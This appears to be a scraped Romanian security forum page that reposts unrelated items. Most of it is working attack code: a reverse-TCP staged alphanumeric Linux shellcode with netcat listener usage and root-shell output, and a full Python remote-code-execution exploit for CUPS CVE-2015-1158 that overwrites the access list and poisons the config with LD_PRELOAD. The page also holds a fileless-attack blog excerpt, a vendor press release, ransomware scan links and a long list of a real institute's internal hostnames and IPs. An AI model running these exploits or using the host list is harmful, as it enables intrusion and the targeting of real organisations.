Leaderboard

########### Reverse TCP Staged Alphanumeric Shellcode Linux x86 Execve /bin/sh ######## ########### Author: Snir Levi, Applitects ############# ## 103 Bytes ## date: 9.2.17 Automatic python shellcode handler (with stage preset send) will be ready soon: https://github.com/snir-levi/Reverse_TCP_Alphanumeric_Staged_Shellcode_Execve-bin-bash/ IP - 127.0.0.1 PORT - 4444 #### Stage Alphanumeric shellcode: ##### Stage 1: dup2 stdin syscall: WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP W push edi X pop eax W push edi [ pop ebx j? push 0x3f X pop eax V push esi [ pop ebx W push edi Y pop ecx P push eax X pop eax P push eax X pop EAX Stage 2: dup2 stdout syscall: WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX W push edi X pop eax W push edi [ pop ebx j? push 0x3f X pop eax V push esi [ pop ebx W push edi Y pop ecx A inc ecx (ecx =1) P push eax X pop eax P push eax Stage 3: dup2 stderr syscall: WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP W push edi X pop eax W push edi [ pop ebx j? push 0x3f X pop eax V push esi [ pop ebx W push edi Y pop ecx A*2 inc ecx (ecx = 2) P push eax X pop eax A inc ecx Stage 3: execve /bin/sh: j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[ j0 push 0x30 X pop eax H*32 dec eax //eax = 0x0b W push edi Y pop ecx W push edi Z pop edx W push edi // null terminator h//sh push 0x68732f2f //sh h/bin push 0x6e69622f /bin T push esp [ pop ebx Usage: Victim Executes the shellcode, and opens tcp connection Stage: After Connection is established, send the 4 stages ***separately*** nc -lvp 4444 connect to [127.0.0.1] from localhost [127.0.0.1] (port) WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[ whoami root id uid=0(root) gid=0(root) groups=0(root) global _start _start: ; sock = socket(AF_INET, SOCK_STREAM, 0) ; AF_INET = 2 ; SOCK_STREAM = 1 ; syscall number 102 - socketcall ; socket = 0x01 xor eax,eax xor esi,esi push eax pop edi push eax mov al, 0x66 push byte 0x1 pop ebx push byte ebx push byte 0x2 mov ecx, esp int 0x80 xchg esi, eax; save sock result ; server.sin_family = AF_INET ; server.sin_port = htons(PORT) ; server.sin_addr.s_addr = inet_addr("127.0.0.1") push byte 0x1 pop edx shl edx, 24 mov dl, 0x7f ;edx = 127.0.0.1 (hex) push edx push word 0x5c11 ;port 4444 push word 0x02 ; connect(sock, (struct sockaddr *)&server, sockaddr_len) mov al, 0x66 mov bl, 0x3 mov ecx, esp push byte 0x10 push ecx push esi mov ecx ,esp int 0x80 stageAddress: ;saves stage address to edx mov edx, [esp] sub bl,3 jnz stage call near stageAddress ;recv(int sockfd, void *buf, size_t len, int flags); stage: mov al, 0x66 mov bl, 10 push edi push word 100 ; buffer size push edi push esi ; socketfd mov [esp+4],esp ; sets esp as recv buffer mov ecx,esp int 0x80 mov al, 0xcd mov ah, 0x80 ; eax = int 0x80 mov bl, 0xFF mov bh, 0xE2 ; ebx = jmp edx mov [esp+57],al mov [esp+58],ah mov [esp+59], ebx ;the end of the buffer contains the syscall command int 0x80 and jmp back to stage jmp esp unsigned char[] = "\x31\xc0\x31\xf6\x50\x5f\x50\xb0\x66\x6a\x01\x5b\x53\x6a \x02\x89\xe1\xcd\x80\x96\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52 \x66\x68\x11\x5c\x66\x6a\x02\xb0\x66\xb3\x03\x89\xe1\x6a\x10\x51\x56\x89\xe1 \xcd\x80\x8b\x14\x24\x80\xeb\x03\x75\x05\xe8\xf3\xff\xff\xff \xb0\x66\xb3\x0a\x57\x66\x6a\x64\x57\x56\x89\x64\x24\x04\x89\xe1\xcd\x80\xb0 \xcd\xb4\x80\xb3\xff\xb7\xe2\x88\x44\x24\x39\x88\x64\x24\x3a \x89\x5c\x24\x3b\xff\xe4" Sursa: https://www.exploit-db.com/exploits/41282/.

During incident response, a team of security specialists needs to follow the artefacts that attackers have left in the network. Artefacts are stored in logs, memories and hard drives. Unfortunately, each of these storage media has a limited timeframe when the required data is available. One reboot of an attacked computer will make memory acquisition useless. Several months after an attack the analysis of logs becomes a gamble because they are rotated over time. Hard drives store a lot of needed data and, depending on its activity, forensic specialists may extract data up to a year after an incident. That’s why attackers are using anti-forensic techniques (or simply SDELETE) and memory-based malware to hide their activity during data acquisition. A good example of the implementation of such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package it removes the package from the hard drive with file renaming and leaves part of itself in the memory with a payload. That’s why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that are going to be installed in the network by attackers. Cybercriminals (like Carbanak or GCMAN) may use PLINK for that. Duqu2 used a special driver for that. Now you may understand why we were very excited and impressed when, during an incident response, we found that memory-based malware and tunnelling were implemented by attackers using Windows standard utilities like “SC” and “NETSH“. Read more: https://securelist.com/blog/research/77403/fileless-attacks-against-enterprise-networks/

How about... grow up si nu va mai comportati ca niste pitiponci?

Se pare ca exista un "mic" glitch in Youtube, un bug destul de idiot care adauga 1 subscriber atunci cand te abonezi si scade 2 in momentul in care da unsubscribe. In acest fel poti ajunge la un numar negativ de abonati. LE: A fost rezolvat. Counter live: https://livecounts.net/channel/pewdiepie Demonstratie live:

Culmea, ca nici nu s-o chinuit aia sa schimbe portul din 4444 in altceva.

#!/usr/bin/python # Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution # Google Dork: n/a # Date: 2/2/17 # Exploit Author: @0x00string # Vendor Homepage: cups.org # Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2 # Version: <2.0.3 # Tested on: Ubuntu 14/15 # CVE : CVE-2015-1158 import os, re, socket, random, time, getopt, sys from socket import * from struct import * def banner(): print ''' lol ty google 0000000000000 0000000000000000000 00 00000000000000000000000000000 0000000000000000000000000000000 000000000 0000000000 00000000 0000000000 0000000 000000000000 0000000 000000000000000 000000 000000000 000000 0000000 000000000 000000 000000 000000000 000000 000000 000000000 000000 000000 00000000 000000 000000 000000000 000000 0000000 000000000 0000000 000000 000000000 000000 0000000000000000 0000000 0000000000000 0000000 00000000000 00000000 00000000000 000000000 0000000000000000000000000000000 00000000000000000000000000000 000 0000000000000000000 0000000000000 @0x00string github.com/0x00string/oldays/CVE-2015-1158.py ''' def usage (): print ("python script.py <args>\n" " -h, --help: Show this message\n" " -a, --rhost: Target IP address\n" " -b, --rport: Target IPP service port\n" " -c, --lib /path/to/payload.so\n" " -f, --stomp-only Only stomp the ACL (no postex)\n" "\n" "Examples:\n" "python script.py -a 10.10.10.10 -b 631 -f\n" "python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\n") exit() def pretty (t, m): if (t is "+"): print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n", elif (t is "-"): print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n", elif (t is "*"): print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n", elif (t is "!"): print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n", def createDump (input): d, b, h = '', [], [] u = list(input) for e in u: h.append(e.encode("hex")) if e == '0x0': b.append('0') elif 30 > ord(e) or ord(e) > 128: b.append('.') elif 30 < ord(e) or ord(e) < 128: b.append(e) i = 0 while i < len(h): if (len(h) - i ) >= 16: d += ' '.join(h[i:i+16]) d += " " d += ' '.join(b[i:i+16]) d += "\n" i = i + 16 else: d += ' '.join(h[i:(len(h) - 0 )]) pad = len(' '.join(h[i:(len(h) - 0 )])) d += ' ' * (56 - pad) d += ' '.join(b[i:(len(h) - 0 )]) d += "\n" i = i + len(h) return d class tcpsock: def __init__(self, sock=None): if sock is None: self.sock = socket( AF_INET, SOCK_STREAM) self.sock.settimeout(30) else: self.sock = sock def connect(self, host, port): self.sock.connect((host, int(port))) def tx(self, msg): self.sock.send(msg) def rx(self): tmp = self.sock.recv(1024) msg = "" while tmp: msg += tmp tmp = self.sock.recv(1024) return msg def txrx (ip, port, proto, txpacket): if (proto is "tcp"): sock = tcpsock() elif (proto is "udp"): sock = udpsock() else: return None sock.connect(ip, port) sock.tx(txpacket) rxpacket = sock.rx() return rxpacket def locatePrinters(rhost, rport="631"): request = ( "GET /printers HTTP/1.1\x0d\x0a" "Host: " + rhost + ":" + rport + "\x0d\x0a" "User-Agent: CUPS/2.0.2\x0d\x0a" "Connection: Close\x0d\x0a" "\x0d\x0a") response = txrx(rhost, int(rport), "tcp", request) if response is not None: m = re.search('<TR><TD><A HREF="(.+)">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response) if m is not None: printer = m.group(1) pretty("+","printer found: " + printer) else: pretty("-","no printers") exit(1) return printer def preparePayload(libpath): with open(libpath, 'rb') as f: payload = f.read() if payload is not None: pretty("*","Payload:\n" + createDump(payload)) else: pretty("-","something went wrong") usage() return payload def seedTarget(rhost, rport, printer, payload): i = random.randint(1,3) reqid = str(pack(">i",(i+2))) reqid2 = str(pack(">i",(i+3))) printer_uri = "ipp://" + rhost + ":" + str(rport) + printer create_job_packet = ("\x02\x00" "\x00\x05"+ reqid+ "\x01" "\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8" "\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us" "\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri + "\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root" "\x42"+"\x00\x08"+"job-name"+"\x00\x06"+"badlib" "\x02" "\x21"+"\x00\x06"+"copies"+"\x00\x04"+"\x00\x00\x00\x01" "\x23"+"\x00\x0a"+"finishings"+"\x00\x04"+"\x00\x00\x00\x03" "\x42"+"\x00\x10"+"job-cancel-after"+"\x00\x05"+"\x31\x30\x38\x30\x30" "\x44"+"\x00\x0e"+"job-hold-until"+"\x00\x0a"+"indefinite" "\x21"+"\x00\x0c"+"job-priority"+"\x00\x04"+"\x00\x00\x00\x32" "\x42"+"\x00\x0a"+"job-sheets"+"\x00\x04"+"none"+"\x42"+"\x00\x00\x00\x04"+"none" "\x21"+"\x00\x09"+"number-up"+"\x00\x04"+"\x00\x00\x00\x01" "\x03") pretty("*","Sending createJob") http_header1 = ( "POST " + printer + " HTTP/1.1\x0d\x0a" "Content-Type: application/ipp\x0d\x0a" "Host: " + rhost + ":" + str(rport) + "\x0d\x0a" "User-Agent: CUPS/2.0.2\x0d\x0a" "Connection: Close\x0d\x0a" "Content-Length: " + str(len(create_job_packet) + 0) + "\x0d\x0a" "\x0d\x0a") createJobRequest = http_header1 + create_job_packet blah = txrx(rhost,int(rport),"tcp",createJobRequest) if blah is not None: m = re.search("ipp://" + rhost + ":" + str(rport) + "/jobs/(\d+)",blah) if m is not None: jobid = m.group(1) else: pretty("-","something went wrong"); exit() pretty("*","\n" + createDump(blah) + "\n") pretty("*", "Sending sendJob") send_document_packet = ("\x02\x00" "\x00\x06"+ reqid2+ "\x01" "\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8" "\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us" "\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri + "\x21"+"\x00\x06"+"job-id"+"\x00\x04"+ str(pack(">i", int(jobid))) + "\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root" "\x42"+"\x00\x0d"+"document-name"+"\x00\x06"+"badlib" "\x49"+"\x00\x0f"+"document-format"+"\x00\x18"+"application/octet-stream" "\x22"+"\x00\x0d"+"last-document"+"\x00\x01"+"\x01" "\x03"+ payload) http_header2 = ( "POST " + printer + " HTTP/1.1\x0d\x0a" "Content-Type: application/ipp\x0d\x0a" "Host: " + rhost + ":" + str(rport) + "\x0d\x0a" "User-Agent: CUPS/2.0.2\x0d\x0a" "Connection: Close\x0d\x0a" "Content-Length: " + str(len(send_document_packet) + 0) + "\x0d\x0a" "\x0d\x0a") sendJobRequest = http_header2 + send_document_packet blah2 = txrx("172.20.32.3",631,"tcp",sendJobRequest) pretty("*","\n" + createDump(blah) + "\n") pretty("*","job id: " + jobid) return jobid def stompACL(rhost, rport, printer): i = random.randint(1,1024) printer_url = "ipp://" + rhost + ":" + rport + printer admin_stomp = ("\x02\x00" # vers 2.0 "\x00\x05"+ # op id: Create Job (0x0005) str(pack(">i",(i+1)))+ "\x01" # op attributes marker "\x47" # charset "\x00\x12" # name len: 18 "attributes-charset" "\x00\x08" # val len: 8 "us-ascii" "\x48" # natural language "\x00\x1b" # name len: 27 "attributes-natural-language" "\x00\x06" # val len: 6 "/admin" "\x45" # printer-uri "\x00\x0b" # name len 11 "printer-uri" + str(pack(">h", len(printer_url))) + printer_url + "\x42" # name without lang "\x00\x14" # name len: 20 "requesting-user-name" "\x00\x06" # val len: 6 "/admin" "\x02" # job attrs marker "\x21" # integer "\x00\x06" # name len: 6 "copies" "\x00\x04" # val len: 4 "\x00\x00\x00\x01" # 1 "\x42" # name w/o lang "\x00\x19" # name len: 25 "job-originating-host-name" "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x36" # nwl "\x00\x00" # name len: 0 "\x00\x16" # val len: 22 "\x00\x06" # length "/admin" "\x00\x0c" "BBBBBBBBBBBB" "\x03") # end of attributes conf_stomp = ("\x02\x00" # vers 2.0 "\x00\x05"+ # op id: Create Job (0x0005) str(pack(">i",(i+2)))+ "\x01" # op attributes marker "\x47" # charset "\x00\x12" # name len: 18 "attributes-charset" "\x00\x08" # val len: 8 "us-ascii" "\x48" # natural language "\x00\x1b" # name len: 27 "attributes-natural-language" "\x00\x0b" # val len: 11 "/admin/conf" "\x45" # printer-uri "\x00\x0b" # name len 11 "printer-uri" + str(pack(">h", len(printer_url))) + printer_url + "\x42" # name without lang "\x00\x14" # name len: 20 "requesting-user-name" "\x00\x0b" # val len: 11 "/admin/conf" "\x02" # job attrs marker "\x21" # integer "\x00\x06" # name len: 6 "copies" "\x00\x04" # val len: 4 "\x00\x00\x00\x01" # 1 "\x42" # name w/o lang "\x00\x19" # name len: 25 "job-originating-host-name" "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x42" # nwol "\x00\x00" # name len: 0 "\x00\x0c" # val len: 12 "AAAAAAAAAAAA" "\x36" # nwl "\x00\x00" # name len: 0 "\x00\x1b" # val len: 27 "\x00\x0b" # length "/admin/conf" "\x00\x0c" "BBBBBBBBBBBB" "\x03") # end of attributes http_header1 = ("POST " + printer + " HTTP/1.1\x0d\x0a" "Content-Type: application/ipp\x0d\x0a" "Host: " + rhost + ":" + rport + "\x0d\x0a" "User-Agent: CUPS/2.0.2\x0d\x0a" "Connection: Close\x0d\x0a" "Content-Length: " + str(len(admin_stomp)) + "\x0d\x0a" "\x0d\x0a") http_header2 = ("POST " + printer + " HTTP/1.1\x0d\x0a" "Content-Type: application/ipp\x0d\x0a" "Host: " + rhost + ":" + rport + "\x0d\x0a" "User-Agent: CUPS/2.0.2\x0d\x0a" "Connection: Close\x0d\x0a" "Content-Length: " + str(len(conf_stomp)) + "\x0d\x0a" "\x0d\x0a") pretty("*","stomping ACL") pretty("*",">:\n" + createDump(http_header1 + admin_stomp)) pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header1 + admin_stomp))) time.sleep(1) pretty("*",">:\n" + createDump(http_header2 + conf_stomp)) pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header2 + conf_stomp))) http_header_check = ("GET /admin HTTP/1.1\x0d\x0a" "Host: " + rhost + ":" + rport + "\x0d\x0a" "User-Agent: CUPS/2.0.2\x0d\x0a" "Connection: Close\x0d\x0a" "\x0d\x0a") pretty("*","checking /admin") pretty("*",">:\n" + createDump(http_header_check)) res = txrx(rhost,rport,"tcp",http_header_check) pretty("*","<:\n" + createDump(res)) m = re.search('200 OK', res) if m is not None: pretty("+","ACL stomp successful") else: pretty("-","exploit failed") exit(1) def getConfig(rhost, rport): i = random.randint(1,1024) original_config = "" http_request = ("GET /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a" "Host: " + rhost + ":" + rport + "\x0d\x0a" "User-Agent: CUPS/2.0.2\x0d\x0a" "Connection: Close\x0d\x0a" "\x0d\x0a") pretty("*","grabbing configuration file....") res = txrx(rhost,rport,"tcp",http_request) res_array = res.split("\x0d\x0a\x0d\x0a") original_config = res_array[1] pretty("*","config:\n" + original_config + "\n") return original_config def putConfig(rhost, rport, config): http_request = ("PUT /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a" "Content-Type: application/ipp\x0d\x0a" "Host: " + rhost + ":" + rport + "\x0d\x0a" "User-Agent: CUPS/2.0.2\x0d\x0a" "Connection: Keep-Alive\x0d\x0a" "Content-Length: " + str(len(config)) + "\x0d\x0a" "\x0d\x0a") pretty("*","overwriting config...") pretty("*",">:\n" + createDump(http_request + config)) pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config))) def poisonConfig(config, name): config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d00" + name + "-001\x0a" return config def main(): rhost = None; noshell = None; options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',]) for opt, arg in options: if opt in ('-h', '--help'): usage() elif opt in ('-a','--rhost'): rhost = arg; elif opt in ('-b','--rport'): rport = arg; elif opt in ('-c','--lib'): libpath = arg; elif opt in ('-f','--stomp-only'): noshell = 1; banner() if rhost is None or rport is None: usage() pretty("*","locate available printer") printer = locatePrinters(rhost, rport) pretty("*","stomp ACL") stompACL(rhost, rport, printer) if (noshell is not None): pretty("*","fin") exit(0) pretty("*","prepare payload") payload = preparePayload(libpath) pretty("*","spray payload") jobid = seedTarget(rhost, rport, printer, payload) pretty("*","grab original config") OG_config = getConfig(rhost, rport) pretty("*","generate poison config") evil_config = poisonConfig(OG_config, jobid) pretty("*","upload poison config") putConfig(rhost, rport, evil_config) pretty("*","fin") exit(0); if __name__ == "__main__": main() Sursa :

Pe langa asta, ar trebui introduse si cursuri de prim-ajutor !!! sunt mult mai utile decat alte kkturi de materii inventate doar ca sa aibe niste labari de pilosi ce se cred profesori loc de munca.

Acunetix Release Web Site Security Pen Testing Tools Free POSTED ON JANUARY 10, 2017 BY TAMARA NAUDI HTTP editor, fuzzer and sniffer tools help pen testers identify vulnerabilities London, UK – January 2016 – Hot on the release of Acunetix Version 11, pioneering web application security software Acunetix, now delivering Manual Pen Testing Tools at no cost. Penetration testers can make use of an HTTP Editor to modify or craft HTTP requests and analyze responses; intercept and modify HTTP traffic on the fly using the integrated HTTP Sniffer; fuzz test HTTP requests using the HTTP Fuzzer and test Blind SQL Injection vulnerabilities further using the Blind SQL Injector, among others. “Acunetix has for the past decade been an excellent resource in the pentester’s tool kit. Prior to Acunetix v11, these Manual Pen Testing Tools were only available to Acunetix Customers. By releasing our manual tools separately, we aim to facilitate veteran testers as well as up and coming security researchers by making it easy to manually test web applications for logical flaws among others,” added Nicholas Sciberras, CTO, Acunetix. HTTP Editor: Allows you to create, analyze and edit client HTTP requests; as well as inspect server responses. It also includes an encoding and decoding tool to encode/decode text and URL’s to MD5 hashes, UTF-7 and other formats. HTTP Sniffer: A proxy that allows you to analyze HTTP requests and responses, and edit these while they are in transit. The HTTP sniffer can also be used to manually crawl a site, and use the manual crawl to seed an Acunetix scan. HTTP Fuzzer: A tool which allows you to automatically send a large number of HTTP requests including invalid, unexpected and random data to a website, to test input validation and handling of invalid data by the web application. Blind SQL Injector: An automated database data exfiltration tool. By using Blind SQL injection vulnerabilities discovered when scanning a website, it is possible to demonstrate the serious impact a Blind SQL injection vulnerability can have on the website. Used to enumerate databases, tables, fields and dump data from the vulnerable web application. Subdomain Scanner: Scans a top-level domain to discover subdomains configured in its hierarchy, by using the target domain’s DNS server, or any other DNS server specified by the user. While scanning, this tool will also automatically identify and inform the user if the domain being scanned is using some kind of wildcard characters, such as *.domain.com. Target Finder: An IP range / port scanner which can be used to discover running web servers on a given IP or within a specified range of IPs. The list of ports on which the web servers are listening can also be configured. The default ports the scanner will scan are port 80 for HTTP and port 443 for SSL. Authentication Tester: Used to test the strength of both usernames and passwords within HTTP and web forms authentication environments via a dictionary attack. Download the FREE Manual Pen Testing Tools About Acunetix User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology that comprehensively scans and audits complex, authenticated, HTML5 and JavaScript-heavy websites among others. Acunetix detects over 3000 types of web application vulnerabilities and is the industry leader in detecting the largest variety of SQL injection and XSS vulnerabilities, including Out-of-band SQL injection and DOM-based XSS. Acunetix beats competing products in many areas; including speed, limiting false positives and the ability to access restricted areas with ease. Acunetix also has the most advanced detection of WordPress vulnerabilities and a wide range of management and regulatory reports including ISO 27001 and PCI compliance. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritise and control vulnerability threats. Acunetix is available on premises or as an online solution. Acunetix, the company Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader, and a pioneer in automated web application security technology. Acunetix products and technologies are depended on globally by individual pen-testers and consultants all the way to large organizations. It is the tool of choice for many customers in the Government, Military, Educational, Telecommunications, Banking, Finance, and E-Commerce sectors, including many Fortune 500 companies, such as the Pentagon, Nike, Disney, Adobe and many more. Sursa: https://www.acunetix.com/blog/news/acunetix-release-web-site-security-pen-testing-tools-free/

https://www.virustotal.com/en/file/7d9fdeb451f6eeedef20da6c80eb18436ef97155738b6c8ce4771df93999124c/analysis/1485448723/ https://www.virustotal.com/en/file/a1140fdbc264072ff8b054d58e3971d2b1b5da3147ac1ad137edb252ae7e01f0/analysis/1485448648/ Ransomware.

Avertizare cutremur online: mcinaru.infp.ro 91.212.254.106 toma.infp.ro 91.212.254.159 proiector1.infp.ro 91.212.254.131 ns.infp.ro 91.212.254.3 g-manole.infp.ro 91.212.254.83 electro1.infp.ro 91.212.254.87 gabi2.infp.ro 91.212.254.220 alerta.infp.ro 91.212.254.10 chitaru.infp.ro 91.212.254.207 dell.infp.ro 91.212.254.11 antelope.infp.ro 91.212.254.7 scomp.infp.ro 91.212.254.7 victor.infp.ro 91.212.254.175 svc-dac.infp.ro 91.212.254.30 apiadmin.infp.ro 91.212.254.212 pma.api.infp.ro 91.212.254.212 despina-l.infp.ro 91.212.254.101 scanner-seismo.infp.ro 91.212.254.140 pc-scan.infp.ro 91.212.254.166 vri-gw.infp.ro 91.212.254.20 rodica.infp.ro 91.212.254.154 api.infp.ro 91.212.254.212 helitool.infp.ro 91.212.254.249 comdm.infp.ro 91.212.254.177 nucleu2016.infp.ro 91.212.254.10 publicatii.infp.ro 91.212.254.12 hp4250n.infp.ro 91.212.254.19 old-scomp.infp.ro 91.212.254.5 ews-victorin.infp.ro 91.212.254.188 ws2.infp.ro 91.212.254.43 lantronix.infp.ro 91.212.254.200 moxa-buc1.infp.ro 91.212.254.24 ploter-cioflan.infp.ro 91.212.254.100 alexandra-gps.infp.ro 91.212.254.119 afw.infp.ro 91.212.254.42 sconta.infp.ro 91.212.254.62 esnetews.infp.ro 91.212.254.10 infrasound.infp.ro 91.212.254.115 mradu.infp.ro 91.212.254.126 forum.infp.ro 91.212.254.10 wwwb.infp.ro 91.212.254.12 pc-google.infp.ro 91.212.254.169 push.infp.ro 91.212.254.212 gps2-15l.infp.ro 91.212.254.4 sunu10.infp.ro 91.212.254.79 sbalan.infp.ro 91.212.254.136 aftac-ndc.infp.ro 91.212.254.202 www1.infp.ro 91.212.254.12 smartndc.infp.ro 91.212.254.88 iren1.infp.ro 91.212.254.118 mate.infp.ro 91.212.254.68 iren.infp.ro 91.212.254.163 portal.infp.ro 91.212.254.211 hermes2.infp.ro 91.212.254.38 nucleu.infp.ro 91.212.254.10 gps.infp.ro 91.212.254.10 mq.infp.ro 91.212.254.213 acteon.infp.ro 91.212.254.91 infp.ro.infp.ro 91.212.254.3 api1.infp.ro 91.212.254.213 diac.infp.ro 91.212.254.72 ticket.infp.ro 91.212.254.3 doina-d.infp.ro 91.212.254.150 vdev1.infp.ro 91.212.254.41 ncristi3.infp.ro 91.212.254.176 luminita-ar.infp.ro 91.212.254.149 audittmp.infp.ro 91.212.254.250 pirvu1.infp.ro 91.212.254.85 niep.infp.ro 91.212.254.23 canon-dacea.infp.ro 91.212.254.170 mia.infp.ro 91.212.254.223 cam-mobotix-mlr.infp.ro 91.212.254.189 iren2.infp.ro 91.212.254.217 conta1.infp.ro 91.212.254.195 infp2.infp.ro 91.212.254.10 pma.ws2.infp.ro 91.212.254.43 webmail.infp.ro 91.212.254.3 dacea-gw.infp.ro 91.212.254.29 mobile.infp.ro 91.212.254.29 wifi-bibl.infp.ro 91.212.254.168 ines.infp.ro 91.212.254.10 resyr.infp.ro 91.212.254.10 raluca.infp.ro 91.212.254.133 archive.infp.ro 91.212.254.236 pqlxtool.infp.ro 91.212.254.46 dcioflan.infp.ro 91.212.254.74 uds.infp.ro 91.212.254.200 emiliap.infp.ro 91.212.254.235 stefan.infp.ro 91.212.254.201 felix2.infp.ro 91.212.254.66 elearning.infp.ro 91.212.254.22 scomp3.infp.ro 91.212.254.9 ews.infp.ro 91.212.254.10 argus.infp.ro 91.212.254.27 ifs.infp.ro 91.212.254.115 maria-lap.infp.ro 91.212.254.141 intranet.infp.ro 91.212.254.214 rtlc.infp.ro 91.212.254.21 tsunami.infp.ro 91.212.254.10 dcioflan2.infp.ro 91.212.254.241 pviorel.infp.ro 91.212.254.84 platphorma.infp.ro 91.212.254.62 orfeus.infp.ro 91.212.254.10 marius-c.infp.ro 91.212.254.98 moxa.infp.ro 91.212.254.203 atlas.infp.ro 91.212.254.15 pma.zap.infp.ro 91.212.254.214 w1.infp.ro 91.212.254.10 pdaniel.infp.ro 91.212.254.105 felix3.infp.ro 91.212.254.107 acteon3.infp.ro 91.212.254.82 epopescu.infp.ro 91.212.254.123 gmarmureanu.infp.ro 91.212.254.78 pma.wwwb.infp.ro 91.212.254.12 mgh.infp.ro 91.212.254.28 bapostol.infp.ro 91.212.254.135 andreea-t.infp.ro 91.212.254.94 printer-viorel.infp.ro 91.212.254.130 ionescue.infp.ro 91.212.254.197 victorin.infp.ro 91.212.254.185 stefan2.infp.ro 91.212.254.221 reason.infp.ro 91.212.254.10 sun-com.infp.ro 91.212.254.109 www2.infp.ro 91.212.254.212 smart.infp.ro 91.212.254.88 garzi.infp.ro 91.212.254.12 websrv03.infp.ro 91.212.254.214 lucian.infp.ro 91.212.254.236 bala-rezerva.infp.ro 91.212.254.69 rtm.infp.ro 91.212.254.212 bala.infp.ro 91.212.254.71 set.infp.ro 91.212.254.212 campion.infp.ro 91.212.254.156 roepos.infp.ro 91.212.254.12 vpirvu-lap.infp.ro 91.212.254.81 maria-r.infp.ro 91.212.254.96 star84.infp.ro 91.212.254.196 